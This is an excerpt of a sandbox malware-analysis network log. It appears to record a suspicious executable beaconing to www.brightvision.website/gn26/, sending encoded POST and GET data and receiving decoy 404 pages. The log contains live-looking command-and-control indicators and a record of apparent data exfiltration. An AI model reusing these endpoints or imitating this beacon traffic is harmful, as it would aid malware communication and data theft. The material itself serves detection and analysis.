                                                      Data Raw: 72 66 4a 68 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 33 6d 52 79 41 79 48 4e 59 6f 6f 32 35 48 37 32 72 6b 4e 6e 71 75 51 38 76 6a 56 4b 4b 75 36 50 77 54 34 4a 61 35 73 67 37 77 69 73 55 77 4d 6c 46 30 46 61 31 56 61 4c 66 66 4c 35 36 7a 30 6e 6f 55 75 57 2b 4b 73 58 4f 4a 59 6d 34 4b 34 45 71 77 4c 44 4f 39 51 70 34 46 77 49 57 71 51 33 71 41 4e 34 45 4a 2b 6a 77 36 68 71 4f 51 52 59 6f 49 4c 41 68 58 6b 4e 59 75 57 50 37 69 45 6b 6c 48 44 44 32 76 4d 52 6f 36 47 63 4e 37 2b 56 38 52 61 54 47 76 6b 55 55 6d 34 4c 43 43 31 32 2f 4a 37 67 58 75 43 4c 31 70 72 32 34 3d
                                                      Data Ascii: rfJh=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdq3mRyAyHNYoo25H72rkNnquQ8vjVKKu6PwT4Ja5sg7wisUwMlF0Fa1VaLffL56z0noUuW+KsXOJYm4K4EqwLDO9Qp4FwIWqQ3qAN4EJ+jw6hqOQRYoILAhXkNYuWP7iEklHDD2vMRo6GcN7+V8RaTGvkUUm4LCC12/J7gXuCL1pr24=
                                                      Dec 3, 2024 06:56:34.716044903 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:34 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Dec 3, 2024 06:56:34.716110945 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                      Dec 3, 2024 06:56:34.716126919 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                      Dec 3, 2024 06:56:34.716269016 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                      Dec 3, 2024 06:56:34.716279030 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                      Dec 3, 2024 06:56:34.716288090 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                      Dec 3, 2024 06:56:34.716298103 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                      Dec 3, 2024 06:56:34.716306925 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                      Dec 3, 2024 06:56:34.716556072 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                      Dec 3, 2024 06:56:34.716566086 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                      Dec 3, 2024 06:56:34.836123943 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.450038203.161.42.7380792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:36.057744980 CET10752OUTPOST /gn26/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.brightvision.website
                                                      Origin: http://www.brightvision.website
                                                      Referer: http://www.brightvision.website/gn26/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 50 6d 51 41 34 79 47 75 67 6f 70 32 35 48 79 57 72 6c 4e 6e 72 73 51 34 4c 6e 56 4b 47 2b 36 4e 34 54 34 72 43 35 34 42 37 77 35 63 55 77 4a 56 46 50 42 61 31 36 61 4c 50 62 4c 35 4b 7a 30 6e 6f 55 75 54 36 4b 38 32 4f 4a 55 47 34 4a 2f 45 71 30 50 44 4f 52 51 6f 63 7a 77 49 53 6c 51 6e 4b 41 4e 5a 6f 4a 38 78 49 36 73 71 4f 53 57 59 6f 41 4c 41 63 50 6b 4e 30 49 57 4f 50 49 45 6e 35 48 41 45 7a 48 55 69 51 6b 53 4f 56 6d 6e 79 45 52 56 41 36 78 6b 54 56 53 31 6f 36 70 74 46 37 71 77 7a 4b 69 62 4b 6b 71 30 77 57 57 6c 72 44 66 37 65 56 44 36 56 2f 4c 77 36 2b 70 38 36 49 49 32 5a 31 49 6b 2b 57 48 4f 6c 69 62 51 54 45 61 31 79 6a 48 71 2b 2b 71 4d 52 34 42 68 47 78 35 70 6f 4a 61 58 62 5a 5a 65 4e 63 66 31 2b 33 6e 4f 72 35 4d 38 66 32 77 79 4e 6a 69 69 42 4a 31 45 4e 33 51 63 37 7a 36 33 5a 32 64 59 57 56 2f 4a 45 45 79 2b 44 6a 74 69 6b 39 5a 6d 30 4c 4d 4e [TRUNCATED]
                                                      Data Ascii: rfJh=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdqPmQA4yGugop25HyWrlNnrsQ4LnVKG+6N4T4rC54B7w5cUwJVFPBa16aLPbL5Kz0noUuT6K82OJUG4J/Eq0PDORQoczwISlQnKANZoJ8xI6sqOSWYoALAcPkN0IWOPIEn5HAEzHUiQkSOVmnyERVA6xkTVS1o6ptF7qwzKibKkq0wWWlrDf7eVD6V/Lw6+p86II2Z1Ik+WHOlibQTEa1yjHq++qMR4BhGx5poJaXbZZeNcf1+3nOr5M8f2wyNjiiBJ1EN3Qc7z63Z2dYWV/JEEy+Djtik9Zm0LMNd0qaiCiKu6Bu9EkEg8Ak0/1aHT9MWNUMPABeQNcBqe3GrqnUX5BY7pL0sXOzBXc+u1O8oRCSmcxjBW0hfQSCQ7T/UinIY2ZCDGVWPDLZUi0dACT2Pt2owxtqUupxW63dh9bpzjJ2g1ZIljWBi+HrXM9Gc3nL23mtEMYmBeSx3vAByOn9bHJ6PnaXBd1yKk4gVmkf4ma1MticGeuJHnZ70CDWfXhJP1vpEqVr1Ugo6ewsJ+z3npANZ1wVAEZowkcTarH66+hdsuNQOKSHtuRS7T6H3OM2NWBiz1ZQavO9RMlWjqhjTzN9P0se/vB0zSI5gtezgltcGQCPFffwgRVnMpy0SX/K/78jBI8Agf655MnSjR2xBIyRwbSXqAs+s3bdm7bdAGhqqTZW7OhFUgOBooh+k6zYdmnm79EZgyL9RWAR/9T5QnMJ/J4fYlCX8+Cu9/20Q0q/rS8Bvzs0g5sRnL3EJCBGO27eQ3y1balzpfH4VV+AfOReKF4uhQq2UJM+/eAIlc904FobtDvtSLx+z4mp3zqpX05Qq05ssKJycg9qWsZs9n0w8F1g+OlP425jJI25lu/2Z9QrDqJgZUpszMOIpZ7OQDQsOzx9giDHLOS/qIjb4GrTD/UmP88HdrC1xJgSmmap2W6iOsCYlmpZcIvQrjCRptxV5i [TRUNCATED]
                                                      Dec 3, 2024 06:56:37.436388016 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:37 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Dec 3, 2024 06:56:37.436407089 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                      Dec 3, 2024 06:56:37.436418056 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                      Dec 3, 2024 06:56:37.436438084 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                      Dec 3, 2024 06:56:37.436450005 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                      Dec 3, 2024 06:56:37.436460018 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                      Dec 3, 2024 06:56:37.436614037 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                      Dec 3, 2024 06:56:37.436659098 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                      Dec 3, 2024 06:56:37.436671019 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                      Dec 3, 2024 06:56:37.436681986 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                      Dec 3, 2024 06:56:37.556988001 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      36192.168.2.450039203.161.42.7380
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:56:38.989727974 CET371OUTGET /gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.brightvision.website
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:56:40.307801008 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:40 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                      Dec 3, 2024 06:56:40.307821035 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                      Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                      Dec 3, 2024 06:56:40.307831049 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                      Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
